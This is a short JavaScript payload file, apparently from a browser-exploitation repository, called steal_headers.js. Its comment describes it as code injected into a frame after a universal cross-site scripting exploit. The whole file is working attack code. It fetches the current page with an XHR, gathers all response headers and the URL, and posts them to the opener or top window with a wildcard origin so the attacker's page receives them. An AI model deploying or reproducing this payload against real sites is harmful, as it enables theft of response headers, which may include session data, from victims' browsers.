18 lines
575 B
JavaScript
18 lines
575 B
JavaScript
|
/* steal_headers.js: can be injected into a frame/window after a UXSS */
|
||
|
/* exploit to steal the response headers of the loaded URL. */
|
||
|
|
||
|
/* send an XHR request to our current page */
|
||
|
var x = new XMLHttpRequest;
|
||
|
x.open('GET', window.location.href, true);
|
||
|
x.onreadystatechange = function() {
|
||
|
/* when the XHR request is complete, grab the headers and send them back */
|
||
|
if (x.readyState == 2) {
|
||
|
(opener||top).postMessage(JSON.stringify({
|
||
|
headers: x.getAllResponseHeaders(),
|
||
|
url: window.location.href,
|
||
|
send: true
|
||
|
}), '*');
|
||
|
}
|
||
|
};
|
||
|
x.send();
|